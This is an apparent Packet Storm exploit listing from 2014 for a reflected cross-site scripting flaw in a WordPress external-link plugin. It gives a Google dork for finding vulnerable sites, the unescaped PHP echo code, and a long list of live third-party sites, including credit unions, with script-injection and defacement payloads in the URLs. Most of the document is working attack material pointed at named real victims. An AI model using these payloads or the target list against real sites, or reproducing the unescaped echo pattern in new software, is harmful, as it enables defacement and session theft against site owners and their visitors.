WordPress JS External Link Info Cross Site Scripting

2014-04-19T00:00:00
ID PACKETSTORM:126238
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2014-04-19T00:00:00

Description

                                        
                                            `#########################################  
# Exploit Title : Wordpress Wp Js External link Info Cross Site Scripting  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Vendor Homepage : http://wordpress.org  
#  
# Google Dork : inurl:wp-content/plugins/wp-js-external-link-info  
#  
# Date : 2014/4/16  
#  
# Tested on : Windows 7 , Linux  
#  
# Version : 1.21  
#  
######################  
# Exploit : Cross Site Scripting  
# Location : [Target]/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=[XSS]  
#  
######################  
# Vulnerable Code :  
# [CODE]  
  
$url = $_GET['url'];  
$blog = urldecode($_GET['blog']);  
...  
<?php echo $url; ?>  
<?php echo $blog; ?>  
  
# [/CODE]  
#  
###  
Demo  
  
# http://www.timefederalsavings.com/newsite2/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
http://www.motiv.org.uk/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
# http://www.blogoprage.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
# http://sectank.net/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
# http://bkalitva.ru/blog/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://www.thfcu.org/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
# http://openwebstuff.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://www.londonfootball.org.uk/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%22%3E%3Cmarquee%3EHacked%20By%20Milad%20Hacking%20TEST%20XSS%20Loool%3C/marquee%3E  
#  
#  
#http://www.ilikesharepoint.de/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
#http://accordnetwork.org/forum/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://blog.al8z.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://michelearnese.it/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://www.city-infos.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://konaproperty.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://www.degrotelongontstekingmeting.nl/wp/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://www.cityblogs.nfo.ph/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://www.cityblogs.nfo.ph/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
#  
############################################  
  
Discovered By : Milad Hacking  
  
We Love Mohammad  
  
Mail : milad.hacking.blackhat@gmail.com  
  
Home Page : https://www.facebook.com/milad.hacking.5  
  
############################################   
`